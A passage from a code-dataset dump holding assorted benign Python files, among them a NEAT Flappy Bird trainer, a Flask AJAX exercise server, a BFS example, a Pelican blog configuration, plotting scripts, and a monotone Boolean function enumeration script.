temperature_read(*args):\n return dll.AD7190_TemperatureRead(*args)\n","sub_path":"ad7190_linux/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336456331","text":"from bird import Bird\nimport pygame\nimport time\nimport neat\nimport os\nimport random\npygame.font.init()\n\nGEN = 0\n\nWIN_WIDTH = 550\nWIN_HEIGHT = 800\n\nBIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))), pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\nPIPE_IMGS = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\nBG_IMG = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\nBASE_IMG = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\n\nSTATE_FONT = pygame.font.SysFont(\"comicsans\", 50)\n\n\nclass Pipe:\n # Space between pipe\n GAP = 200\n # Speed of the pipe moving backwards\n VEL = 5\n\n def __init__(self, x):\n self.x = x\n self.height = 0\n # Keep track of where the top and bottom pipe will be drawn\n self.top = 0\n self.bottom = 0\n\n self.PIPE_TOP = pygame.transform.flip(PIPE_IMGS, False, True)\n self.PIPE_BOTTOM = PIPE_IMGS\n # Check if this current pipe has pass the bird\n self.passed = False\n self.set_height()\n\n # Used to define how tall both pipes are\n def set_height(self):\n # PIP_TOP's height is 640\n self.height = random.randrange(50, 450)\n self.top = self.height - self.PIPE_TOP.get_height()\n self.bottom = self.height + 
self.GAP\n # print(self.top, self.bottom)\n\n def move(self):\n self.x -= self.VEL\n\n def draw(self, win):\n win.blit(self.PIPE_TOP, (self.x, self.top))\n win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))\n\n def collide(self, bird, win):\n bird_mask = bird.get_mask()\n top_mask = pygame.mask.from_surface(self.PIPE_TOP)\n bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)\n # Offset between the top pipe's mask and the birds masks\n top_offset = (self.x - bird.x, self.top - round(bird.y))\n bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))\n\n # Find their point of collision\n b_point = bird_mask.overlap(bottom_mask, bottom_offset)\n t_point = bird_mask.overlap(top_mask, top_offset)\n\n # if any part of the bird mask overlaps with either the top pipe mask or bottom pipe mask, end the game with the boolean true\n if b_point or t_point:\n return True\n\n return False\n\n\nclass Base:\n # Same speed as pipes\n VEL = 5\n # Get the actual width of this image\n WIDTH = BASE_IMG.get_width()\n IMG = BASE_IMG\n\n def __init__(self, y):\n self.y = y\n self.x1 = 0\n self.x2 = self.WIDTH\n\n def move(self):\n self.x1 -= self.VEL\n self.x2 -= self.VEL\n\n if self.x1 + self.WIDTH < 0:\n self.x1 = self.x2 + self.WIDTH\n\n if self.x2 + self.WIDTH < 0:\n self.x2 = self.x1 + self.WIDTH\n\n def draw(self, win):\n win.blit(self.IMG, (self.x1, self.y))\n win.blit(self.IMG, (self.x2, self.y))\n\n\ndef draw_window(win, birds, pipes, base, score, generation):\n win.blit(BG_IMG, (0, 0))\n for pipe in pipes:\n pipe.draw(win)\n for bird in birds:\n bird.draw(win)\n text = STATE_FONT.render(\"Score: \" + str(score), 1,\n (255, 255, 255))\n win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))\n\n text = STATE_FONT.render(\"Gen: \" + str(generation), 1,\n (255, 255, 255))\n win.blit(text, (10, 10))\n text = STATE_FONT.render(\"Birds: \" + str(len(birds)), 1,\n (255, 255, 255))\n win.blit(text, (200, 10))\n\n base.draw(win)\n pygame.display.update()\n\n\ndef main(genomes, config):\n global GEN\n GEN += 1\n neural_networks = []\n ind_genome = []\n birds = []\n\n for _, genome in genomes:\n network = neat.nn.FeedForwardNetwork.create(genome, config)\n neural_networks.append(network)\n genome.fitness = 0 # Initial fitness set to 0\n ind_genome.append(genome)\n birds.append(Bird(230, 350))\n\n # So that it is at the bottom of our screen cause our height is 800\n base = Base(730)\n pipes = [Pipe(600)]\n # Clock.tick controls the number of ticks for each while loop\n clock = pygame.time.Clock()\n win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n run = True\n score = 0\n while run:\n clock.tick(30)\n add_pipe = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n pipe_index = 0\n if len(birds) > 0:\n if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_BOTTOM.get_width():\n pipe_index = 1\n else:\n # if no bird left quit the game\n run = False\n break\n # Checking the out put value\n for index, bird in enumerate(birds):\n bird.move()\n ind_genome[index].fitness += 0.1\n # Passing in the 3 arguements defined in config-feedforward for our input layer\n output = neural_networks[index].activate((bird.y, abs(\n bird.y - pipes[pipe_index].height), abs(bird.y - pipes[pipe_index].bottom)))\n\n if output[0] > 0.5:\n bird.jump()\n\n for pipe in pipes:\n pipe.move()\n for index, bird in enumerate(birds):\n # Check if each bird has collided\n # If the bird has collided ajust its fitness value\n # -1 from the activation function\n if 
pipe.collide(bird, win):\n ind_genome[index].fitness -= 1\n birds.pop(index)\n neural_networks.pop(index)\n ind_genome.pop(index)\n\n # pipes.append(Pipe(700))\n # if pipe.x =7 300:\n # pipes.append(Pipe(700))\n # Bird has not passed the pipe boolean, and actual position of pipe is behind the x position of the bird\n if not pipe.passed and pipe.x < bird.x:\n pipe.passed = True\n add_pipe = True\n if pipe.x + pipe.PIPE_BOTTOM.get_width() < 0:\n print(\"Removing pipe\")\n pipes.pop(0)\n # Added score and pipes\n if add_pipe:\n score += 1\n for genome in ind_genome:\n genome.fitness += 5\n pipes.append(Pipe(600))\n\n for index, bird in enumerate(birds):\n if bird.y + bird.img.get_height() >= 730 or bird.y < 0:\n birds.pop(index)\n neural_networks.pop(index)\n ind_genome.pop(index)\n\n base.move()\n draw_window(win, birds, pipes, base, score, GEN)\n\n\ndef run(file):\n # Load config file\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n file)\n # Set up pop\n population = neat.Population(config)\n\n # give us some print() in console\n population.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n population.add_reporter(stats)\n\n # Running 50 gens (Calling the main function 50 times)\n winner = population.run(main, 50)\n\n\n# time.sleep(4)\n# Give us our current dir\nif __name__ == \"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, \"config-feedforward.txt\")\n run(config_path)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213517301","text":"from django.shortcuts import render\nimport datetime\nimport sys\nsys.path.append('..')\nfrom information.models import Information\nfrom theme.models import Theme\n\n\n\ndef main(request):\n theme = Theme.objects.all()\n info = Information.objects.all()\n now = datetime.datetime.now()\n nowDate = now.strftime('%Y-%m-%d')\n print(nowDate)\n return render(request, 'main.html', {\n 'today': nowDate,\n 'info': info,\n 'theme': theme,\n })\n","sub_path":"Desktop/rooms/movie/ch1/mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349401630","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x, const):\n return lambda x: An(n) * np.cos(const * n) + Bn(n) * np.sin(const * n)\n\ndef fab():\n return lambda n: 1/(np.pi**2 * n**2), lambda n: -1/(np.pi * n)\n\ndef plotSeries(x, S):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x, S)\n plt.show()\n \na = 0\nb = 1\na0 = 2/3\nrng = int(input('Wpisz range: '))\nT = b-a\nx = np.linspace(a, b, num=1000)\nS = np.zeros((x.shape))\n\nAn, Bn = fab()\nconst = 2 * np.pi * x / T\nf = f(x, const)\nimport time\n\nfig, ax = plt.subplots()\nline, = ax.plot(x, S)\n#ax.set_xlim(a,b)\n#ax.set_ylim(-0.2,1.2)\nax.grid()\n#plt.autoscale()\nfor k in range(1, rng+1):\n S = 0\n nrng = k\n for i in range(1, nrng+1):\n n = i\n S += f(x)\n S += a0/2\n line.set_ydata(S)\n ax.relim()\n ax.autoscale()\n plt.draw()\n plt.pause(0.05)\n\n\nplt.show()\n\n","sub_path":"Lab1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"1167135","text":"\"\"\"Flask server for AJAX 
exercise.\n\nIMPORTANT: you don't need to change this file at all to finish\nthe exercise!\n\"\"\"\n\n\nimport random\n\nfrom flask import Flask, request, render_template, jsonify\n\napp = Flask(__name__)\n\nFORTUNES = [\n \"Tomorrow your code will work properly.\",\n \"Your day ahead will be full of while loops.\",\n \"You will wake up one morning and discover you learned recursion in your sleep.\",\n \"@facebook will retweet an announcement about your Hackbright project.\",\n \"You will inherit a house in San Francisco.\",\n \"In the future, your fortune will be wrong.\",\n]\n\nWEATHER = {\n '94110': {'forecast': 'Rainy, damp, and rich with hipsters.', 'temp': '60F'},\n '99507': {'forecast': 'Warm, balmy, and good for sunbathing.', 'temp': '100F'},\n '94102': {'forecast': 'Delightful, clever, and full of Python.', 'temp': '55F'},\n}\n\nDEFAULT_WEATHER = {'forecast': 'Kind of boring.', 'temp': '68F'}\n\n@app.route('/')\ndef index():\n \"\"\"Show our index page.\"\"\"\n\n return render_template(\"index.html\")\n\n\n@app.route('/fortune')\ndef fortune():\n \"\"\"Return a single fortune as a text string (*not* the whole HTML page!)\"\"\"\n\n return random.choice(FORTUNES)\n\n\n@app.route('/weather.json')\ndef weather():\n \"\"\"Return a weather-info dictionary for this zipcode.\"\"\"\n\n zipcode = request.args.get('zipcode')\n weather_info = WEATHER.get(zipcode, DEFAULT_WEATHER)\n return jsonify(weather_info)\n\n\n@app.route('/order-melons.json', methods=['POST'])\ndef order_melons():\n \"\"\"Order melons and return a dictionary of result-code and result-msg.\"\"\"\n\n melon = request.form.get('melon_type')\n qty = int(request.form.get('qty'))\n\n if qty > 10:\n result_code = 'ERROR'\n result_text = \"You can't buy more than 10 melons\"\n elif qty > 0:\n result_code = 'OK'\n result_text = \"You have bought %s %s melons\" % (qty, melon)\n else:\n result_code = 'ERROR'\n result_text = \"You want to buy fewer than 1 melons? 
Huh?\"\n\n return jsonify({'code': result_code, 'msg': result_text})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"week_4/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415276481","text":"'''\n*Breadth First Search\n1) need vertexList, edgeList, adjacencyList, Queue\n2) return : in form of index list (in assumption that edgeList is consists of index of the node)\n3) input : graphs (ex- graphs = (vertexList, edgeList) )and starting index of node\n\n*When BFS is used?\n1) Finding Shortest Path (Dijkstra algorithm)\n'''\n\nvertexList = [0, 1, 2, 3, 4, 5, 6] #['A', 'B', 'C', 'D', 'E', 'F', 'G']\nedgeList = [(0,1), (1,2), (1,3), (3,4), (4,5), (1,6)]\ngraphs = (vertexList, edgeList)\n\ndef bfs(graph, start) :\n vertexList,edgeList = graph\n\n visitedVertex = []\n queue=[start]\n\n adjacencyList = [[] for vertex in vertexList] #[[], [], [], [], [], [], []]\n print(adjacencyList)\n for edge in edgeList:\n adjacencyList[edge[0]].append(edge[1])\n #adjacencyList: [[1], [2, 3, 6], [], [4], [5], [], []]\n\n while queue:\n current=queue.pop(0) #dequeue\n for neighbor in adjacencyList[current]:\n if not neighbor in visitedVertex:\n queue.append(neighbor) #enqueue\n # end of for loop, adjacencyList[current] might be [2,3,6]\n visitedVertex.append(current)\n #end of while\n\n\n return visitedVertex\n\nprint(bfs(graphs,0))\n#[0, 1, 2, 3, 6, 4, 5]\n","sub_path":"search/02_breadthFirstSearch.py","file_name":"02_breadthFirstSearch.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120745532","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = u'Ian Bicking'\nSITENAME = u'Ian Bicking: a blog'\nSITEURL = 'http://www.ianbicking.org'\n#FEED_DOMAIN = \"http://ianbicking.org\"\n\nimport os\nif os.environ.get(\"OVERRIDE_SITEURL\"):\n SITEURL = os.environ[\"OVERRIDE_SITEURL\"]\n\nTIMEZONE = 'US/Central'\nDATE_FORMATS = {\n \"en\": \"%A, %d %B, %Y\",\n }\nARTICLE_URL = \"blog/{date:%Y}/{date:%m}/{slug}.html\"\nARTICLE_SAVE_AS = \"blog/{date:%Y}/{date:%m}/{slug}.html\"\nPAGE_URL = \"{slug.html}\"\nPAGE_SAVE_AS = \"{slug}.html\"\nDIRECT_TEMPLATES = ('blog/index', 'tags', 'categories', 'archives')\nPAGINATED_DIRECT_TEMPLATES = ['blog/index']\nARTICLE_EXCLUDES = [\"pages\", \"old\"]\nFEED_ATOM = \"feeds/atom.xml\"\nCATEGORY_FEED_ATOM = \"feeds/%s.atom.xml\"\nFEED_MAX_ITEMS = 20\nRELATIVE_URLS = False\nSTATIC_PATHS = [\"media\"]\nTAG_URL = 'tag/{slug}.html'\nTAG_SAVE_AS = 'tag/{slug}.html'\n\nMD_EXTENSIONS = [\n 'codehilite(css_class=highlight)', # Default\n 'extra', # Default\n 'cite', # Extra support\n ]\n\n\ndef FORMAT_DATE(date):\n d = date.strftime(\"%A, %B \")\n day = str(date.day)\n if day[-1] == \"1\":\n day += \"st\"\n elif day[-1] == \"2\":\n day += \"nd\"\n elif day[-1] == \"3\":\n day += \"rd\"\n else:\n day += \"th\"\n d += day + date.strftime(\", %Y\")\n return d\n\nTYPOGRIFY = True\n\nDEFAULT_LANG = u'en-US'\n\n# Blogroll\nLINKS = (\n )\n\nUSE_FOLDER_AS_CATEGORY = False\n\n# built-texts, cebong\n#THEME = '/Users/ianbicking/src/blog.pelican/pelican-themes/built-texts'\nTHEME = './mystyle/'\n\n# Social widget\nSOCIAL = (\n ('Google+', 'https://plus.google.com/+IanBicking/posts'),\n ('@ianbicking (G+ mirror)', 'https://twitter.com/ianbicking'),\n ('Github', 'https://github.com/ianb'),\n )\n\nDEFAULT_PAGINATION = 10\n\nPLUGINS 
= [\n 'pelican.plugins.github_activity',\n 'pelican.plugins.related_posts',\n 'pelican.plugins.assets',\n ]\n\nGITHUB_ACTIVITY_FEED = 'https://github.com/ianb.atom'\n\n\nDISQUS_SITENAME = \"ianbicking\"\nGOOGLE_ANALYTICS = \"UA-2442258-1\"\n\nMENUITEMS = [\n #(\"About\", \"/about.html\"),\n (\"blog\", \"/blog/\"),\n (\"projects\", \"/projects.html\"),\n ]\n\nFILES_TO_COPY = (('favicon.ico', 'favicon.ico'),)\n\nWEBASSETS = True\nDISPLAY_PAGES_ON_MENU = False\nGETATTR = getattr\n\nimport os\nwith open(os.path.join(os.path.dirname(__file__), \"content/old/archive-fragment.html\")) as fp:\n EXTRA_ARCHIVE = fp.read()\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"522225666","text":"#### Visualization in 2D ####\n### Elementary Plot ###\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy\nfrom Luke_Color import *\n\n# Global Setting\nplt.rcParams['font.family'] = 'CMU Serif' # Require CMU Serif font file. If not found, clear /home/luke/.cache/matplotlib\nplt.rcParams['font.size'] = '14' # Font Size\nplt.rcParams['mathtext.fontset'] = 'cm' # cm: Computer Mathematics\nplt.rcParams['mathtext.rm'] = 'CMU Serif' # Require CMU Serif font file\n#plt.rcParams['text.usetex'] = True # Require TeX environment\nformatter = mpl.ticker.ScalarFormatter(useMathText=True)\nformatter.set_scientific(True) \nformatter.set_powerlimits((-1,1))\n\nfig, ax = plt.subplots(figsize=(8,6))\nfig.suptitle('SupTitle', size='18', color='black')\n\nx = np.linspace(-10,20,1000)\ny = x**3+5*x**2+10\nz = 3*x**2+10*x\na = 6*x+10\ng = 100*np.sin(50*x)*np.exp(-x**2)+200\nm = x**3-30*x\nn = x**4\n\nax.set_title(\"SubTitle\", size=16, color='black')\n\n# Line\nax.plot(x, y, label=\"y(x)\",color=myGold)\nax.plot(x, z, label=\"z(x)\",color=myRed)\nline,=ax.plot(x, a, label='a(x)',color=myOrange); line.set_dashes([1,1])\nline,=ax.plot(x, g, alpha=1.0,label='Gaussian(x)',color=myGreen); line.set_dashes([1,0])\nax.plot(x, m, label=\"m(x)\",color=myBlue)\nax.plot(x, n, label=\"n(x)\",color=myPurple)\n\n# Load Data\nx, y = np.loadtxt('04 Visualization/data01.dat', unpack=True)\nline,=plt.plot(20*x-5, 1000*y, antialiased=True,label='Data',color=myViolet); line.set_dashes([1,0])\n\n# Text label\nax.text(0, 800, \"Text label\", fontsize=14, family=\"cmr10\",bbox=dict(boxstyle='round',ec=(0.84,0.84,0.84,0.5),fc=(1.0,1.0,1.0,0.5)))\n\n# Annotation\nax.plot(1, 0, \"o\")\nax.annotate(\"Annotation\",fontsize=14, family=\"cmr10\",xy=(1, 0), xycoords=\"data\",xytext=(+10, +100), textcoords=\"offset points\", arrowprops=dict(arrowstyle=\"->\", connectionstyle=\"arc3, rad=-0.5\"))\n\nax.grid(True, linestyle='--', color='#C8C8C8') # Grid\nax.legend(loc='best') # Label\n#ax.legend(bbox_to_anchor=(1.02, 1), loc=2, borderaxespad=0.0) # Label (outside)\nax.set(xlabel=\"X-Axis $x$\") # X-Axis Label\nax.set(ylabel=\"Y-Axis $y=f(x)$\") # X-Axis Label\nplt.xlim(-5, 11)\nplt.ylim(-100, 1100)\nplt.xticks([-4,-2,0,2,4,6,8,10], ['$-4$','$-2$','$0$','$2$','$4$','$6$','$8$','$10$'])\nplt.yticks([0,200,400,600,800,1000], ['$0$','$200$','$400$','$600$','$800$','$1.0×10^3$'])\n#ax.xaxis.set_major_formatter(formatter) # Scientific Counting Method: If you use this, Please close plt.xticks\n#ax.yaxis.set_major_formatter(formatter) # Scientific Counting Method: If you use this, Please close plt.xticks\nax.set_axisbelow(True)\nax.tick_params(direction='in', top=True, right=True, 
bottom=True, left=True, which='both')\n#mpl.ticker.LogLocator()\n\nfig.savefig(\"2D Elementary Plot Py.pdf\", dpi=1080)\nplt.show()\n\n### More Information ###\n# https://matplotlib.org","sub_path":"Python Matplotlib/2D Elementary Plot.py","file_name":"2D Elementary Plot.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140161988","text":"#! /usr/bin/python3\n\nimport sys\nimport os\nimport langid\nimport collections\n\ndef test_one(ident, cm, xfail_languages, fname):\n    lang = os.path.basename(fname)\n    lang = lang[:lang.find('.')]\n    if lang[-1] == '_':\n        lang = lang[:-1]\n        xfail_languages.add(lang)\n\n    with open(fname) as f:\n        text = \"\\n\".join(ll for ll in (l.strip() for l in f)\n                         if ll and ll[0] != '#')\n\n    result = ident.classify(text)[0]\n    cm[lang][result] += 1\n\ndef main():\n    ident = langid.LanguageIdentifier.from_model(norm_probs=False)\n    cm = collections.defaultdict(collections.Counter)\n\n    xfail_languages = set()\n    for fname in os.listdir(\"tests\"):\n        if fname.endswith(\".txt\"):\n            test_one(ident, cm, xfail_languages, \"tests/\" + fname)\n\n    all_languages = set()\n    for row, col in cm.items():\n        all_languages.add(row)\n        all_languages.update(col.keys())\n\n    misid_from = set()\n    misid_to = set()\n    for row in all_languages:\n        for col in all_languages:\n            if row != col:\n                if cm[row][col]:\n                    misid_from.add(row)\n                    misid_to.add(col)\n\n    misid_from = sorted(misid_from)\n    misid_to = sorted(misid_to)\n\n    sys.stdout.write(\"<!DOCTYPE html>\\n<html><body>\\n\"\n                     \"<table>\\n\"\n                     \"<tr><td></td> \\n\")\n    for lang in misid_to:\n        cl = (' class=\"x\"' if lang in xfail_languages else '')\n        sys.stdout.write(\"<th{}>{}</th>\".format(cl, lang))\n    sys.stdout.write(\"</tr>\\n\")\n    for row in misid_from:\n        cl = (' class=\"x\"' if row in xfail_languages else '')\n        sys.stdout.write(\"<tr><th{}>{}</th>\".format(cl, row))\n        for col in misid_to:\n            n = cm[row][col]\n            cl = \"\"\n            if n > 0:\n                if row == col:\n                    cl = \"y\"\n                else:\n                    cl = \"n\"\n                if row in xfail_languages or col in xfail_languages:\n                    cl += \"x\"\n            if cl:\n                cl = ' class=\"{}\"'.format(cl)\n            if n > 1:\n                sys.stdout.write(\"<td{}>{}</td>\".format(cl, n))\n            else:\n                sys.stdout.write(\"<td{}></td>\".format(cl))\n        sys.stdout.write(\"</tr>\\n\")\n    sys.stdout.write(\"</table></body></html>
\\n\")\n\nmain()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"551124685","text":"#! python3\n\n#TODO:\n# work on applying the aggregation functions to the dataframe\n# place this all in a function call\n\nimport sqlite3\nimport AHutils\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport pandas\nimport math\n\n#Connect to SQLite DB\nprint(\"Connecting to SQLite database...\")\nconn = sqlite3.connect('Data/Database/wowAH.db')\nc = conn.cursor()\n\n\n\ndf = pandas.read_sql_query(AHutils.db_Query_ItemSummary(conn, 'Formula: Enchant Cloak - Greater Resistance'), conn)\n\n#add weighted rolling average\n#probably want to turn this into a function\n#i believe this calculation is wrong, need to check\nweightedRollingAvg = []\nif len(df[\"MinBuy\"]) >=5:\n for i in range(0,4):\n weightedRollingAvg.append(None)\n for i in range(4,len(df[\"MinBuy\"])):\n MovAvg = 0\n MovAvg = MovAvg + df[\"MinBuy\"][i] * 5\n MovAvg = MovAvg + df[\"MinBuy\"][i-1] * 4\n MovAvg = MovAvg + df[\"MinBuy\"][i-2] * 3\n MovAvg = MovAvg + df[\"MinBuy\"][i-3] * 2\n MovAvg = MovAvg + df[\"MinBuy\"][i-4]\n MovAvg = int(round(MovAvg/(5+4+3+2)))\n weightedRollingAvg.append(MovAvg)\ndf[\"WMA\"] = weightedRollingAvg\n\n\n# Percent Change since beginning of dataframe\nbegVal = df[\"MinBuy\"][0]\nPercentChange = []\nif len(df[\"MinBuy\"]) >=1:\n for i in range(0,len(df[\"MinBuy\"])):\n tempVal = 0.0\n tempVal = round((df[\"MinBuy\"][i] - begVal)/begVal, 4)*100\n PercentChange.append(tempVal)\ndf[\"Delta\"] = PercentChange\n\n\n\n#percent change from prior day\nbegVal = df[\"MinBuy\"][0]\nDailyPercentChange = []\nif len(df[\"MinBuy\"]) >= 1:\n DailyPercentChange.append(0.0)\n for i in range(1,len(df[\"MinBuy\"])):\n tempVal = 0.0\n tempVal = round((df[\"MinBuy\"][i] - df[\"MinBuy\"][i-1])/df[\"MinBuy\"][i-1], 4)*100\n DailyPercentChange.append(tempVal)\ndf[\"DailyDelta\"] = DailyPercentChange\n#print(len(PercentChange))\nprint(df)\n\n\n\nfig = px.line(df, x=\"Date\", y=\"WMA\", color = \"Item\", title='Minimum Price')\n\n\nfig.for_each_trace(\n lambda trace: trace.update(name=trace.name.replace(\"Item=\", \"\")),\n)\n\nfig.show()\n\n\nfrom plotly.subplots import make_subplots\n\n# Create figure with secondary y-axis\nfig2 = make_subplots(specs=[[{\"secondary_y\": True}]])\n\nfig2.add_trace(\n go.Bar(x = df[\"Date\"], y = df[\"Volume\"], name = 'Volume'),\n secondary_y = False\n)\n\nfig2.add_trace(\n go.Scatter(x = df[\"Date\"], y = df[\"Delta\"], name = 'Delta'),\n secondary_y = True\n)\n\n\nfig.update_layout(\n title_text=\"% Change and Volume\"\n)\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"primary yaxis title\", secondary_y=False)\nfig.update_yaxes(title_text=\"secondary yaxis title\", secondary_y=True)\n\nfig2.show()\n\n\nc.close()\nconn.close()\n\n\n\n\n","sub_path":"report_testing.py","file_name":"report_testing.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195864903","text":"# A non-empty zero-indexed array A consisting of N integers is given. Array A represents a linked list. 
A list is constructed from this array as follows:\n# the first node (the head) is located at index 0;\n# the value of a node located at index K is A[K];\n# if the value of a node is −1 then it is the last node of the list; otherwise, the successor of a node located at index K is located at index A[K]\n# (you can assume that A[K] is a valid index, that is 0 ≤ A[K] < N).\n\n# For example, for array A such that:\n# A[0] = 1\n# A[1] = 4\n# A[2] = -1\n# A[3] = 3\n# A[4] = 2\n\n# the following list is constructed: \n# the first node (the head) is located at index 0 and has a value of 1;\n# the second node is located at index 1 and has a value of 4;\n# the third node is located at index 4 and has a value of 2;\n# the fourth node is located at index 2 and has a value of −1.\n# Write a function:\n\n# class Solution { \n# public int solution(int[] A); \n# }\n\n# that, given a non-empty zero-indexed array A consisting of N integers, returns the length of the list constructed from\n# A in the above manner. \n# For example, given array A such that:\n# A[0] = 1\n# A[1] = 4\n# A[2] = -1\n# A[3] = 3\n# A[4] = 2\n# the function should return 4, as explained in the example above.\n# Assume that:\n# N is an integer within the range\n# [1..200,000];\n# each element of array A is an integer\n# within the range [−1..N−1];\n# it will always be possible to construct the list and its length will be finite.\n\n# In your solution, focus on correctness. The performance\n# of your solution will not be the focus of the assessment.\n\nimport unittest\nimport random\n\nINT_RANGE = (1, 200000)\n\nclass Solution(object):\n    def solution(self, A):\n        if len(A) == 1:\n            if A[0] == -1:\n                return 1\n            else:\n                return 0\n        next = A[0]\n        size = 0\n        while next != -1 and size < len(A):\n            next = A[next]\n            size += 1\n        return size + 1\n\nclass Test(unittest.TestCase):\n\n    def __init__(self, _):\n        super(Test, self).__init__(_)\n        self.s = Solution()\n\n    def test_example(self):\n        self.assertEqual(self.s.solution([1, 4, -1, 3, 2]), 4)\n\n    def test_single(self):\n        self.assertEqual(self.s.solution([1]), 0)\n\n    def test_two(self):\n        self.assertEqual(self.s.solution([-1]), 1)\n\n    def test_extreme(self):\n        arr = [X for X in range(1, INT_RANGE[1] - 1)]\n        i = random.randint(1, INT_RANGE[1])\n        arr.insert(i, -1)\n        self.assertEqual(self.s.solution(arr), i + 1)\n\ndef main():\n    unittest.main()\n\nif __name__ == '__main__':\n    main()","sub_path":"codility/arr_list_len.py","file_name":"arr_list_len.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"448741855","text":"from __future__ import print_function\nimport bz2\nimport multiprocessing\nimport os\nimport pickle\nimport time\nfrom utils import cpu_time\nfrom inequivalent import compute_permutations\nfrom inequivalent import find_inequivalent_mbfs\n\nnprofiles_done = 0\ncount = 0\npermutations = None\noutdir = None\n\ndef compute_number_of_inequivalent_mbfs_cb(result):\n    global count\n    global nprofiles_done\n\n    profile, nmbfs, nimbfs, t = result\n    nprofiles_done += 1\n    count += nimbfs\n\n    print(\"%d. 
Profile %s done!\\t%10d (/%d) inequivalent MBFs found \" \\\n \"(%.02f seconds)\" % (nprofiles_done, str(profile), nimbfs, nmbfs, t))\n\ndef compute_inequivalent_mbfs(filepath):\n global permutations\n global outdir\n\n t1 = cpu_time()\n\n f = bz2.BZ2File(filepath, 'rb')\n mbfs = pickle.load(f)\n nmbfs = len(mbfs)\n imbfs = find_inequivalent_mbfs(mbfs, permutations)\n f.close()\n\n t = cpu_time() - t1\n\n profile = os.path.splitext(os.path.basename(filepath))[0]\n profile = os.path.splitext(profile)[0]\n profile = tuple(map(int, profile.split(\"-\")))\n\n if outdir is not None:\n filenameout = \"-\".join(map(str, profile)) + \".pkl.bz2\"\n fileout = bz2.BZ2File(outdir + filenameout, 'wb')\n pickle.dump(imbfs, fileout)\n fileout.close()\n\n return profile, nmbfs, len(imbfs), t\n\ndef compute_all_inequivalent_mbfs(n, indir, outd = None):\n global count\n global outdir\n global permutations\n\n indir = indir + \"/\" if indir is not None else None\n outdir = outd + \"/\" if outd is not None else None\n\n n = tuple((i + 1) for i in range(n))\n permutations = compute_permutations(n)\n\n t1 = time.time()\n\n print(\"Number of CPUs: %d\" % multiprocessing.cpu_count())\n\n pool = multiprocessing.Pool()\n n = 0\n for f in os.listdir(indir):\n if f.endswith(\".pkl.bz2\") is False:\n continue\n\n pool.apply_async(compute_inequivalent_mbfs,\n (indir + f,),\n callback = compute_number_of_inequivalent_mbfs_cb)\n\n pool.close()\n pool.join()\n\n print(\"total time: %.02f seconds\" % (time.time() - t1))\n print(count)\n\nif __name__ == \"__main__\":\n import sys\n import multiprocessing\n\n if len(sys.argv) < 3:\n print(\"usage: %s n indir [outdir]\" % sys.argv[0])\n sys.exit(1)\n\n outd = sys.argv[3] if len(sys.argv) > 3 else None\n compute_all_inequivalent_mbfs(int(sys.argv[1]), sys.argv[2], outd)\n","sub_path":"compute_inequivalent_mbfs.py","file_name":"compute_inequivalent_mbfs.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"182273271","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport 